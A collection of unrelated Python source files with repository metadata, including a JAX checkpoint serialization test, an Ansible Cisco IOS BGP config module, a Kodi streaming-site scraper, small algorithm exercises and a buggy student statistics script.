9102954aee63aa1de8128785de2d2f9e90d976f9 | a79cccacfa422012caac481b5eff80f6e911d0af | /jax/experimental/gda_serialization/serialization_test.py | cef36c9f56c1553a70bcf8e80935396e0bf0d8b0 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
]
| permissive | jblespiau/jax | f932fe6df23942756957db61655f6cc9c6d67d64 | 46a666c4489b9e04d2777cf2156453bc48a8e432 | refs/heads/main | 2022-04-17T01:50:55.041057 | 2022-04-15T08:49:52 | 2022-04-15T08:49:52 | 481,888,965 | 0 | 0 | Apache-2.0 | 2022-04-15T08:20:44 | 2022-04-15T08:20:43 | null | UTF-8 | Python | false | false | 6,163 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for serialization and deserialization of GDA."""
import pathlib
import unittest
from absl.testing import absltest
import jax
from jax._src import test_util as jtu
from jax._src import util
from jax.config import config
from jax.experimental import PartitionSpec as P
from jax.experimental.global_device_array import GlobalDeviceArray
from jax.experimental.gda_serialization import serialization
from jax.experimental.maps import Mesh
import numpy as np
config.parse_flags_with_absl()
def create_global_mesh(mesh_shape, axis_names):
  """Build a Mesh over the first prod(mesh_shape) local devices.

  Skips the calling test when the host has fewer devices than required.
  """
  required = util.prod(mesh_shape)
  devices = jax.devices()
  if len(devices) < required:
    raise unittest.SkipTest(f'Test requires {required} local devices')
  device_grid = np.array(devices[:required]).reshape(mesh_shape)
  return Mesh(device_grid, axis_names)
class CheckpointTest(jtu.JaxTestCase):
def test_checkpointing(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
num = util.prod(global_input_shape)
# First GDA
global_input_data1 = np.arange(num).reshape(global_input_shape)
def cb1(index):
return global_input_data1[index]
gda1 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
mesh_axes, cb1)
ckpt_dir1 = pathlib.Path(self.create_tempdir('first').full_path)
# Second GDA
global_input_data2 = np.arange(num, num + num).reshape(global_input_shape)
def cb2(index):
return global_input_data2[index]
gda2 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
mesh_axes, cb2)
ckpt_dir2 = pathlib.Path(self.create_tempdir('second').full_path)
# Third GDA
def cb3(index):
return np.array([])
global_mesh1d = create_global_mesh((8,), ('x',))
gda3 = GlobalDeviceArray.from_callback((0,), global_mesh1d, P(None), cb3)
ckpt_dir3 = pathlib.Path(self.create_tempdir('third').full_path)
ckpt_paths = [str(ckpt_dir1), str(ckpt_dir2), str(ckpt_dir3)]
tspecs = jax.tree_map(serialization.get_tensorstore_spec, ckpt_paths)
serialization.run_serialization([gda1, gda2, gda3], tspecs)
m1, m2, m3 = serialization.run_deserialization(
[global_mesh, global_mesh, global_mesh1d],
[mesh_axes, P('x'), P(None)],
tspecs)
self.assertArraysEqual(m1.local_shards[0].data.to_py(),
np.array([[0], [2]]))
self.assertArraysEqual(m1.local_shards[1].data.to_py(),
np.array([[1], [3]]))
self.assertEqual(m1.local_shards[0].data.shape, (2, 1))
self.assertEqual(m1.dtype, np.int32)
self.assertArraysEqual(m2.local_shards[0].data.to_py(),
np.array([[16, 17], [18, 19]]))
self.assertArraysEqual(m2.local_shards[1].data.to_py(),
np.array([[16, 17], [18, 19]]))
self.assertEqual(m2.local_shards[0].data.shape, (2, 2))
self.assertEqual(m2.dtype, np.int32)
for i, s in enumerate(m3.local_shards):
self.assertEqual(s.index, (slice(None),))
self.assertEqual(s.replica_id, i)
self.assertArraysEqual(s.data.to_py(), np.array([]))
self.assertEqual(m3.dtype, np.float32)
  def test_checkpointing_with_bigger_shape(self):
    """Restores a checkpoint into a larger global shape.

    A (8, 2) array is serialized, then deserialized as (12, 2) on a
    bigger mesh; positions past the stored data are expected to be
    zero-filled.
    """
    global_mesh = create_global_mesh((2, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    num = util.prod(global_input_shape)
    # First GDA
    global_input_data1 = np.arange(num).reshape(global_input_shape)
    def cb1(index):
      return global_input_data1[index]
    gda1 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
                                           P('x', 'y'), cb1)
    ckpt_dir1 = pathlib.Path(self.create_tempdir('first').full_path)
    ckpt_paths = [str(ckpt_dir1)]
    tspecs = jax.tree_map(serialization.get_tensorstore_spec, ckpt_paths)
    serialization.run_serialization([gda1], tspecs)
    # Deserialize on a (4, 2) mesh with a padded (12, 2) global shape.
    m1, = serialization.run_deserialization(
        [create_global_mesh((4, 2), ('x', 'y'))],
        [P('x', 'y')],
        tspecs,
        [(12, 2)],
    )
    # Expected per-device shards; rows 8-11 were never written and
    # come back as zeros.
    expected_data = {
        0: np.array([[0], [2], [4]]),
        1: np.array([[1], [3], [5]]),
        2: np.array([[6], [8], [10]]),
        3: np.array([[7], [9], [11]]),
        4: np.array([[12], [14], [0]]),
        5: np.array([[13], [15], [0]]),
        6: np.array([[0], [0], [0]]),
        7: np.array([[0], [0], [0]]),
    }
    for l in m1.local_shards:
      self.assertArraysEqual(l.data.to_py(), expected_data[l.device.id])
  def test_spec_has_metadata(self):
    """_spec_has_metadata returns True when a 'metadata' key exists at any depth."""
    # 'metadata' nested one level down must still be detected.
    spec = {
        'a': {
            'b': 1,
            'c': 2,
        },
        'd': 3,
        'e': {
            'a': 2,
            'metadata': 3
        },
        'f': 4
    }
    self.assertTrue(serialization._spec_has_metadata(spec))
    # Top-level 'metadata' key (typical tensorstore spec layout).
    self.assertTrue(
        serialization._spec_has_metadata({
            'driver': 'zarr',
            'kvstore': 'gfile',
            'metadata': {
                'chunks': 4,
                'shape': (32, 64)
            },
            'one_more': 'thing'
        }))
  def test_spec_has_no_metadata(self):
    """_spec_has_metadata returns False when no 'metadata' key exists anywhere."""
    spec = {
        'a': {
            'b': 1,
            'c': 2,
        },
        'd': 3,
        'e': {
            'a': 2,
        },
        'f': 4
    }
    self.assertFalse(serialization._spec_has_metadata(spec))
  def test_empty_spec_has_no_metadata(self):
    """An empty spec trivially contains no metadata."""
    spec = {}
    self.assertFalse(serialization._spec_has_metadata(spec))
# Run the test suite with JAX's test loader when executed directly.
if __name__ == '__main__':
  absltest.main(testLoader=jtu.JaxTestLoader())
| [
"[email protected]"
]
| |
1958e4fd3cd5234c86f6dd7f259d43da2a520bd3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03032/s283156387.py | 473d0ed84ab4c0f25eab299ea36e78724919eff4 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | n,k = map(int,input().split())
lis = list(map(int,input().split()))
ans = 0
for i in range(n):
for j in range(n-i+1):
num = lis[:i]
if j > 0:
num += lis[-j:]
if len(num) <= k:
cnt = min(len(num),k-len(num))
num.sort()
for h in range(cnt):
num[h] = max(0,num[h])
ans = max(ans,sum(num))
print(ans) | [
"[email protected]"
]
| |
582302c3619958b67faf74202cdf4418340616c1 | b2f8c41358f6c6f4ce78328695a7b4f96adf806b | /staff_crm/apps.py | c4f1bce309a4b15bd048c1a4cfc2964dc43f754b | []
| no_license | funsojoba/staff_management_api | 6f472ea0a53095b6860969cf88f87b50fea69729 | 792bc652ec61e3f0d16bab1ff36cf72643161dbe | refs/heads/main | 2023-05-24T04:45:20.895495 | 2021-06-13T19:45:07 | 2021-06-13T19:45:07 | 373,336,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | from django.apps import AppConfig
class StaffCrmConfig(AppConfig):
    """Django application configuration for the staff_crm app."""
    # Use 64-bit auto-incrementing primary keys by default (Django 3.2+).
    default_auto_field = 'django.db.models.BigAutoField'
    # Dotted path / label under which Django registers this app.
    name = 'staff_crm'
| [
"[email protected]"
]
| |
2b1c888ed19da3073b1fcc9a4ad2599f84ed38f0 | 64bf39b96a014b5d3f69b3311430185c64a7ff0e | /intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/cisco/ios/plugins/module_utils/network/ios/providers/cli/config/bgp/address_family.py | 0e0ce1ab78fecbd074f6c23d7f5f4d6866007720 | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | SimonFangCisco/dne-dna-code | 7072eba7da0389e37507b7a2aa5f7d0c0735a220 | 2ea7d4f00212f502bc684ac257371ada73da1ca9 | refs/heads/master | 2023-03-10T23:10:31.392558 | 2021-02-25T15:04:36 | 2021-02-25T15:04:36 | 342,274,373 | 0 | 0 | MIT | 2021-02-25T14:39:22 | 2021-02-25T14:39:22 | null | UTF-8 | Python | false | false | 5,305 | py | #
# (c) 2019, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import re
from ansible.module_utils.six import iteritems
from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import (
to_list,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.providers.providers import (
CliProvider,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.providers.cli.config.bgp.neighbors import (
AFNeighbors,
)
from ansible.module_utils.common.network import to_netmask
class AddressFamily(CliProvider):
    """Renders IOS `address-family` sections under `router bgp <asn>`.

    Each `_render_<key>` method turns one key of an address-family dict
    into CLI commands, diffing against the device's current config so
    only missing lines are emitted.
    """
    def render(self, config=None):
        """Return the list of CLI commands for all address families.

        config -- current device configuration text (or None); when given,
        commands already present are suppressed and, in `replace` mode,
        stale address families are negated.
        """
        commands = list()
        safe_list = list()
        router_context = "router bgp %s" % self.get_value("config.bgp_as")
        context_config = None
        for item in self.get_value("config.address_family"):
            context = "address-family %s" % item["afi"]
            # "unicast" is the implicit default SAFI and is omitted.
            if item["safi"] != "unicast":
                context += " %s" % item["safi"]
            context_commands = list()
            if config:
                # Narrow the device config down to this address-family block.
                context_path = [router_context, context]
                context_config = self.get_config_context(
                    config, context_path, indent=1
                )
            # Dispatch each present key to its matching _render_* method.
            for key, value in iteritems(item):
                if value is not None:
                    meth = getattr(self, "_render_%s" % key, None)
                    if meth:
                        resp = meth(item, context_config)
                        if resp:
                            context_commands.extend(to_list(resp))
            # Only open/close the section if it actually emits commands.
            if context_commands:
                commands.append(context)
                commands.extend(context_commands)
                commands.append("exit-address-family")
                safe_list.append(context)
        # In replace mode, remove address families not in the desired state.
        if self.params["operation"] == "replace":
            if config:
                resp = self._negate_config(config, safe_list)
                commands.extend(resp)
        return commands
    def _negate_config(self, config, safe_list=None):
        """Return `no address-family ...` lines for sections absent from safe_list."""
        commands = list()
        matches = re.findall(r"(address-family .+)$", config, re.M)
        for item in set(matches).difference(safe_list):
            commands.append("no %s" % item)
        return commands
    def _render_auto_summary(self, item, config=None):
        """Render `auto-summary` / `no auto-summary` if not already configured."""
        cmd = "auto-summary"
        if item["auto_summary"] is False:
            cmd = "no %s" % cmd
        if not config or cmd not in config:
            return cmd
    def _render_synchronization(self, item, config=None):
        """Render `synchronization` / `no synchronization` if not already configured."""
        cmd = "synchronization"
        if item["synchronization"] is False:
            cmd = "no %s" % cmd
        if not config or cmd not in config:
            return cmd
    def _render_networks(self, item, config=None):
        """Render `network ...` statements; negate stale ones in replace mode."""
        commands = list()
        safe_list = list()
        for entry in item["networks"]:
            # `network` tracks the full statement text used for diffing.
            network = entry["prefix"]
            cmd = "network %s" % network
            if entry["masklen"]:
                cmd += " mask %s" % to_netmask(entry["masklen"])
                network += " mask %s" % to_netmask(entry["masklen"])
            if entry["route_map"]:
                cmd += " route-map %s" % entry["route_map"]
                network += " route-map %s" % entry["route_map"]
            safe_list.append(network)
            if not config or cmd not in config:
                commands.append(cmd)
        if self.params["operation"] == "replace":
            if config:
                matches = re.findall(r"network (.*)", config, re.M)
                for entry in set(matches).difference(safe_list):
                    commands.append("no network %s" % entry)
        return commands
    def _render_redistribute(self, item, config=None):
        """Render `redistribute ...` statements; negate stale ones in replace mode."""
        commands = list()
        safe_list = list()
        for entry in item["redistribute"]:
            # `option` is "<protocol> [<id>]" — the key used for diffing.
            option = entry["protocol"]
            cmd = "redistribute %s" % entry["protocol"]
            # Only these protocols take a process/instance id on IOS.
            if entry["id"] and entry["protocol"] in (
                "ospf",
                "ospfv3",
                "eigrp",
            ):
                cmd += " %s" % entry["id"]
                option += " %s" % entry["id"]
            if entry["metric"]:
                cmd += " metric %s" % entry["metric"]
            if entry["route_map"]:
                cmd += " route-map %s" % entry["route_map"]
            if not config or cmd not in config:
                commands.append(cmd)
            safe_list.append(option)
        if self.params["operation"] == "replace":
            if config:
                # Capture "protocol" and optional numeric id separately.
                matches = re.findall(
                    r"redistribute (\S+)(?:\s*)(\d*)", config, re.M
                )
                for i in range(0, len(matches)):
                    matches[i] = " ".join(matches[i]).strip()
                for entry in set(matches).difference(safe_list):
                    commands.append("no redistribute %s" % entry)
        return commands
    def _render_neighbors(self, item, config):
        """Delegate per-neighbor rendering to the AFNeighbors provider."""
        return AFNeighbors(self.params).render(
            config, nbr_list=item["neighbors"]
        )
| [
"[email protected]"
]
| |
be4034b96252307d6e130988d30401bb65314765 | d7f4596491b47d74689d8731c9d0f10b51b5693f | /fastcampus/코딩테스트_면접/02. 알고리즘 이론/graph.py | 6b593b8ff449f75e4ad3cf2229502620e69e8a70 | []
| no_license | wonjongah/DataStructure_CodingTest | 797b62d48321abf065f1507f14a3ed0902f48399 | 9d28c2aefbba2486f6158c066fd249fca3904346 | refs/heads/main | 2023-06-04T15:54:30.048106 | 2021-06-30T14:09:41 | 2021-06-30T14:09:41 | 327,008,361 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | graph = dict()
graph['A'] = ['B', 'C']
graph['B'] = ['A', 'D']
graph['C'] = ['A', 'G', 'H', 'I']
graph['D'] = ['B', 'E', 'F']
graph['E'] = ['D']
graph['F'] = ['D']
graph['G'] = ['C']
graph['H'] = ['C']
graph['I'] = ['C', 'J']
graph['J'] = ['I']
print(graph) | [
"[email protected]"
]
| |
59fedb17f8722439c3814f478d134f626b0a4c4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/48/usersdata/82/15966/submittedfiles/estatistica.py | 31ad4a0026cf93a6236f0ea7646c0afd92d24f53 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | # -*- coding: utf-8 -*-
from __future__ import division
def media(lista):
soma = 0
for i in range(0,len(lista),1):
soma = soma + lista[i]
media = soma/len(lista)
return media
a=[]
b=[]
n= input ('Digite a quantidade de elementos:')
for i in range (0,n,1):
a.append(input('Digite um elemento:'))
for i in range (0,n,1):
b.append(input('Digite um elemento:'))
media_a = media(a)
media_b = media(b)
print('%.2f' %media_a)
print('%.2f' %media_b)
#Por último escreva o programa principal, que pede a entrada e chama as funções criadas.
def desviopadrao(lista):
soma=0
for j in range (0,n,1):
soma=soma+(l[j]-media)**2
s=((1/(n-1))*soma)**(1/2)
print('%.2f' %media_a)
print('%2.f' desviopadrao_a)
print('%.2f' %media_b)
print('%2.f' %desviopadrao_b)
| [
"[email protected]"
]
| |
5941ae15de8d50faefafcad8fed4e9d17d948e27 | c7a6f8ed434c86b4cdae9c6144b9dd557e594f78 | /ECE364/.PyCharm40/system/python_stubs/348993582/gtk/_gtk/MountOperation.py | d327e51af64f413a5022e8715f458a73a8e61d5b | []
| no_license | ArbalestV/Purdue-Coursework | 75d979bbe72106975812b1d46b7d854e16e8e15e | ee7f86145edb41c17aefcd442fa42353a9e1b5d1 | refs/heads/master | 2020-08-29T05:27:52.342264 | 2018-04-03T17:59:01 | 2018-04-03T17:59:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,919 | py | # encoding: utf-8
# module gtk._gtk
# from /usr/lib64/python2.6/site-packages/gtk-2.0/gtk/_gtk.so
# by generator 1.136
# no doc
# imports
import atk as __atk
import gio as __gio
import gobject as __gobject
import gobject._gobject as __gobject__gobject
# Auto-generated stub for the GtkMountOperation GObject type; method
# bodies are placeholders ("real signature unknown") produced by the
# binding introspector — do not expect runnable logic here.
class MountOperation(__gio.MountOperation):
    """
    Object GtkMountOperation
    Properties from GtkMountOperation:
      parent -> GtkWindow: Parent
        The parent window
      is-showing -> gboolean: Is Showing
        Are we showing a dialog
      screen -> GdkScreen: Screen
        The screen where this window will be displayed.
    Signals from GMountOperation:
      ask-password (gchararray, gchararray, gchararray, GAskPasswordFlags)
      ask-question (gchararray, GStrv)
      reply (GMountOperationResult)
      aborted ()
      show-processes (gchararray, GArray, GStrv)
    Properties from GMountOperation:
      username -> gchararray: Username
        The user name
      password -> gchararray: Password
        The password
      anonymous -> gboolean: Anonymous
        Whether to use an anonymous user
      domain -> gchararray: Domain
        The domain of the mount operation
      password-save -> GPasswordSave: Password save
        How passwords should be saved
      choice -> gint: Choice
        The users choice
    Signals from GObject:
      notify (GParam)
    """
    # Accessors for the GtkMountOperation properties listed above.
    def get_parent(self, *args, **kwargs): # real signature unknown
        pass
    def get_screen(self, *args, **kwargs): # real signature unknown
        pass
    def is_showing(self, *args, **kwargs): # real signature unknown
        pass
    def set_parent(self, *args, **kwargs): # real signature unknown
        pass
    def set_screen(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    # GType placeholder filled in at runtime by the gtk bindings.
    __gtype__ = None # (!) real value is ''
"[email protected]"
]
| |
e260d0d50c7d74e84cf1062a5c25ccbe38c4e375 | 90360a1de1c19ab217ff0fceaaa3140cad4ddaa5 | /plugin.video.salts/scrapers/icefilms_scraper.py | 9fffbf94a63ac44d5c3ce8d39de54d0ed860f31e | []
| no_license | trickaz/tknorris-beta-repo | 934cbbf089e12607fe991d13977f0d8a61354f01 | c4b82ef1b402514ef661bcc669852c44578fcaa0 | refs/heads/master | 2021-01-22T14:25:19.271493 | 2014-10-17T06:19:39 | 2014-10-17T06:19:39 | 25,358,146 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,462 | py | """
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import re
import urllib
import urlparse
import HTMLParser
import string
import xbmcaddon
from salts_lib.db_utils import DB_Connection
from salts_lib import log_utils
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
QUALITY_MAP = {'HD 720P': QUALITIES.HD, 'DVDRIP / STANDARD DEF': QUALITIES.HIGH}
#BROKEN_RESOLVERS = ['180UPLOAD', 'HUGEFILES', 'VIDPLAY']
BROKEN_RESOLVERS = []
BASE_URL='http://www.icefilms.info'
class IceFilms_Scraper(scraper.Scraper):
    """SALTS scraper for icefilms.info (movies, TV shows, seasons, episodes).

    Scrapes listing/detail pages via regexes and resolves hoster links
    through the site's AjaxResp endpoint.
    """
    base_url=BASE_URL
    def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
        self.timeout=timeout
        self.db_connection = DB_Connection()
        # User-configurable base URL overrides the module default.
        self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))
    @classmethod
    def provides(cls):
        """Video types this scraper can serve."""
        return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])
    @classmethod
    def get_name(cls):
        return 'IceFilms'
    def resolve_link(self, link):
        """POST the stored query back to the site and extract the hoster URL.

        Returns None when the hoster is in BROKEN_RESOLVERS or no URL is found.
        """
        url, query = link.split('?', 1)
        data = urlparse.parse_qs(query, True)
        url = urlparse.urljoin(self.base_url, url)
        html = self._http_get(url, data=data, cache_limit=0)
        match = re.search('url=(.*)', html)
        if match:
            url=urllib.unquote_plus(match.group(1))
            if url.upper() in BROKEN_RESOLVERS:
                url = None
        return url
    def format_source_label(self, item):
        """Human-readable label shown in the source-selection dialog."""
        label='[%s] %s%s (%s/100) ' % (item['quality'], item['label'], item['host'], item['rating'])
        return label
    def get_sources(self, video):
        """Scrape the video's detail page and return a list of source dicts.

        Each source carries the hoster, quality bucket and the AjaxResp URL
        that resolve_link() later turns into a playable URL.
        """
        source_url=self.get_url(video)
        sources = []
        if source_url:
            try:
                url = urlparse.urljoin(self.base_url, source_url)
                html = self._http_get(url, cache_limit=.5)
                # The sources live inside an iframe; fetch its document.
                pattern='<iframe id="videoframe" src="([^"]+)'
                match = re.search(pattern, html)
                frame_url = match.group(1)
                url = urlparse.urljoin(self.base_url, frame_url)
                html = self._http_get(url, cache_limit=.5)
                # `secret` and `t` are anti-scraping tokens embedded in the page,
                # required by the AjaxResp endpoint.
                match=re.search('lastChild\.value="([^"]+)"', html)
                secret=match.group(1)
                match=re.search('"&t=([^"]+)', html)
                t=match.group(1)
                # Each <div class=ripdiv> groups links of one quality level.
                pattern='<div class=ripdiv>(.*?)</div>'
                for container in re.finditer(pattern, html):
                    fragment=container.group(0)
                    match=re.match('<div class=ripdiv><b>(.*?)</b>', fragment)
                    if match:
                        quality=QUALITY_MAP[match.group(1).upper()]
                    else:
                        quality=None
                    pattern='onclick=\'go\((\d+)\)\'>([^<]+)(<span.*?)</a>'
                    for match in re.finditer(pattern, fragment):
                        link_id, label, host_fragment = match.groups()
                        source = {'multi-part': False, 'quality': quality, 'class': self, 'label': label, 'rating': None, 'views': None, 'direct': False}
                        # Strip markup to leave just the hoster name.
                        host=re.sub('(<[^>]+>|</span>)','',host_fragment)
                        source['host']=host.lower()
                        if host.upper() in BROKEN_RESOLVERS:
                            continue
                        url = '/membersonly/components/com_iceplayer/video.phpAjaxResp.php?id=%s&s=999&iqs=&url=&m=-999&cap=&sec=%s&t=%s' % (link_id, secret, t)
                        source['url']=url
                        sources.append(source)
            except Exception as e:
                # Best effort: log and return whatever was collected so far.
                log_utils.log('Failure (%s) during icefilms get sources: |%s|' % (str(e), video))
        return sources
    def get_url(self, video):
        return super(IceFilms_Scraper, self)._default_get_url(video)
    def search(self, video_type, title, year):
        """Search the alphabetical index for `title` and return match dicts."""
        if video_type==VIDEO_TYPES.MOVIE:
            url = urlparse.urljoin(self.base_url, '/movies/a-z/')
        else:
            url = urlparse.urljoin(self.base_url,'/tv/a-z/')
        # The site indexes titles ignoring leading articles; digits share '1'.
        if title.upper().startswith('THE '):
            first_letter=title[4:5]
        elif title.upper().startswith('A '):
            first_letter = title[2:3]
        elif title[:1] in string.digits:
            first_letter='1'
        else:
            first_letter=title[:1]
        url = url + first_letter.upper()
        html = self._http_get(url, cache_limit=.25)
        # Pages are windows-1252 with HTML entities; normalize before matching.
        h = HTMLParser.HTMLParser()
        html = unicode(html, 'windows-1252')
        html = h.unescape(html)
        norm_title = self._normalize_title(title)
        pattern = 'class=star.*?href=([^>]+)>(.*?)(?:\s*\((\d+)\))?</a>'
        results=[]
        for match in re.finditer(pattern, html, re.DOTALL):
            url, match_title, match_year = match.groups('')
            if norm_title in self._normalize_title(match_title) and (not year or not match_year or year == match_year):
                result={'url': url, 'title': match_title, 'year': match_year}
                results.append(result)
        return results
    def _get_episode_url(self, show_url, video):
        """Locate the episode page by SxE pattern (or by title as fallback)."""
        episode_pattern = 'href=(/ip\.php[^>]+)>%sx0?%s\s+' % (video.season, video.episode)
        title_pattern='class=star>\s*<a href=([^>]+)>(?:\d+x\d+\s+)+([^<]+)'
        return super(IceFilms_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)
    def _http_get(self, url, data=None, cache_limit=8):
        # Thin wrapper adding base_url/timeout to the cached HTTP fetch.
        return super(IceFilms_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)
| [
"[email protected]"
]
| |
1c9798c3ad320b1268eb7c05f3413c11de8cc2c4 | 74d6b36ae48a2153fa35c56d2448c05b64c72bf8 | /contests/550/A-two-substrings.py | 1cd1bdb89a05efe3c401c3f0559cc701f7386b67 | []
| no_license | hariharanragothaman/codeforces-solutions | 205ec8b717e8eb3e4d700fc413159c49a582cff6 | 1566a9187cc16e1461ddb55dbcc393493604dfcd | refs/heads/master | 2023-06-24T11:33:52.255437 | 2021-07-25T14:33:52 | 2021-07-25T14:33:52 | 282,783,158 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,935 | py | """
Given a string, we need to find , if it contains AB, and BA seperately and they are non-overlapping
The strings can be in any order.
"""
from typing import List
p = 31
m = 10 ** 9 + 9
def compute_hash(s, p=31, m=10 ** 9 + 9):
    """Return the polynomial prefix hashes of lowercase string `s`.

    hash_values[i] is the hash of s[:i], so hash_values has len(s) + 1
    entries and hash_values[0] == 0. Characters are mapped 'a' -> 1 ...
    'z' -> 26 and combined as sum(c_k * p**k) mod m.

    The original version computed these values and discarded them
    (implicitly returning None); it now returns the list. `p` and `m`
    default to the module-level constants so existing callers keep the
    same hash values.
    """
    n = len(s)
    # power_mod[k] == p**k % m
    power_mod = [1]
    for i in range(n):
        power_mod.append((power_mod[-1] * p) % m)
    hash_values = [0] * (n + 1)
    for i in range(n):
        hash_values[i + 1] = (
            hash_values[i] + (ord(s[i]) - ord("a") + 1) * power_mod[i]
        ) % m
    return hash_values
def count_occurences(text, pattern, p=31, m=10 ** 9 + 9):
    """Return the start indices of all occurrences of `pattern` in `text`.

    Rabin-Karp with polynomial hashing: precompute prefix hashes of
    `text`, then compare each window's hash against the pattern hash
    shifted by the window offset. Assumes lowercase a-z input.

    :param text: the string to search in
    :param pattern: the string to search for
    :param p: polynomial base (defaults to the module-level constant)
    :param m: modulus (defaults to the module-level constant)
    :return: list of 0-based start offsets, in increasing order
    """
    text_length = len(text)
    pattern_length = len(pattern)
    # power_mod[k] == p**k % m
    power_mod = [1]
    for i in range(text_length):
        power_mod.append((power_mod[-1] * p) % m)
    # hash_values[i] is the hash of text[:i].
    hash_values = [0] * (text_length + 1)
    for i in range(text_length):
        hash_values[i + 1] = (
            hash_values[i] + (ord(text[i]) - ord("a") + 1) * power_mod[i]
        ) % m
    pattern_hash = 0
    for i in range(pattern_length):
        pattern_hash += ((ord(pattern[i]) - ord("a") + 1) * power_mod[i]) % m
    occurences = []
    i = 0
    while i + pattern_length - 1 < text_length:
        # Hash of text[i:i+pattern_length], still scaled by p**i ...
        field_hash = (hash_values[i + pattern_length] - hash_values[i] + m) % m
        # ... so compare against pattern_hash shifted by the same factor.
        if field_hash == pattern_hash * power_mod[i] % m:
            occurences.append(i)
        i += 1
    return occurences
def solve(s):
    """Return True iff `s` contains non-overlapping "AB" and "BA" (either order).

    Occurrence lists are found via Rabin-Karp (count_occurences); two
    occurrences at indices i and j do not overlap exactly when
    |i - j| >= 2 since both patterns have length 2.

    NOTE: the hashing assumes lowercase input; the driver passes the raw
    input line, so matching only works when the search patterns and the
    string use the same case convention — verify against the caller.
    """
    # Left-over brute-force helper; currently unused (the `start += 2`
    # step also looks like it would skip overlapping matches — dead code).
    def helper(s, char) -> List:
        n = len(s)
        res = []
        start = 0
        while s:
            idx = s.find(char, start, n)
            if idx != -1:
                res.append(idx)
                start += 2
            elif idx == -1:
                break
        return res
    # result1 = helper(s, char='AB')
    # result2 = helper(s, char='BA')
    result1 = count_occurences(s, pattern="AB")
    result2 = count_occurences(s, pattern="BA")
    # Find two occurrences (one per pattern) that do not overlap.
    a = []
    b = []
    if result1 and result2:
        if result1[0] < result2[0]:
            a, b = result1, result2
        else:
            a, b = result2, result1
        for i, val1 in enumerate(a):
            for j, val2 in enumerate(b):
                # Length-2 matches at val1 and val2 are disjoint iff gap >= 2.
                if abs(val1 - val2) >= 2:
                    return True
        return False
    else:
        # One of the patterns never occurs.
        return False
# Read the input string from stdin and report whether it contains
# non-overlapping "AB" and "BA" substrings.
if __name__ == "__main__":
    s = input()
    res = solve(s)
    if res:
        print("YES")
    else:
        print("NO")
| [
"[email protected]"
]
| |
fc6ec366cc16a9f609e3910d19770d58645a59b8 | eb3683f9127befb9ef96d8eb801206cf7b84d6a7 | /stypy/invokation/type_rules/modules/numpy/lib/ufunclike/ufunclike__type_modifiers.py | 8a0fa8e78c44a7d76c174b17b2107251eb822674 | []
| no_license | ComputationalReflection/stypy | 61ec27333a12f76ac055d13f8969d3e0de172f88 | be66ae846c82ac40ba7b48f9880d6e3990681a5b | refs/heads/master | 2021-05-13T18:24:29.005894 | 2018-06-14T15:42:50 | 2018-06-14T15:42:50 | 116,855,812 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy
from stypy.invokation.handlers import call_utilities
class TypeModifiers:
    """Type rules for numpy.lib.ufunclike members (stypy type inference)."""
